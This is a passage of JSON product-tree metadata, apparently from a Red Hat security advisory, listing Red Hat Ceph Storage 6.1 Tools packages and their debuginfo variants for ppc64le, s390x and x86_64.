"9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-debugsource-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-debugsource-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-debugsource-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-debugsource-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-fuse-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-fuse-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-fuse-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-fuse-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-fuse-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mib-2:17.2.6-167.el9cp.noarch as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch" }, "product_reference": "ceph-mib-2:17.2.6-167.el9cp.noarch", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-resource-agents-2:17.2.6-167.el9cp.noarch as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch" }, "product_reference": "ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-selinux-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-selinux-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-selinux-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-selinux-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-selinux-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "cephadm-2:17.2.6-167.el9cp.noarch as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch" }, "product_reference": "cephadm-2:17.2.6-167.el9cp.noarch", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "cephadm-ansible-1:2.18.0-1.el9cp.noarch as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch" }, "product_reference": "cephadm-ansible-1:2.18.0-1.el9cp.noarch", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "cephadm-ansible-1:2.18.0-1.el9cp.src as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src" }, "product_reference": "cephadm-ansible-1:2.18.0-1.el9cp.src", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "cephfs-top-2:17.2.6-167.el9cp.noarch as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch" }, "product_reference": "cephfs-top-2:17.2.6-167.el9cp.noarch", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs-devel-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs-devel-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x" }, "product_reference": "libcephfs-devel-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs-devel-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs2-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "libcephfs2-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs2-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x" }, "product_reference": "libcephfs2-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs2-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "libcephfs2-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados-devel-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librados-devel-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados-devel-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librados-devel-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados-devel-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librados-devel-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": 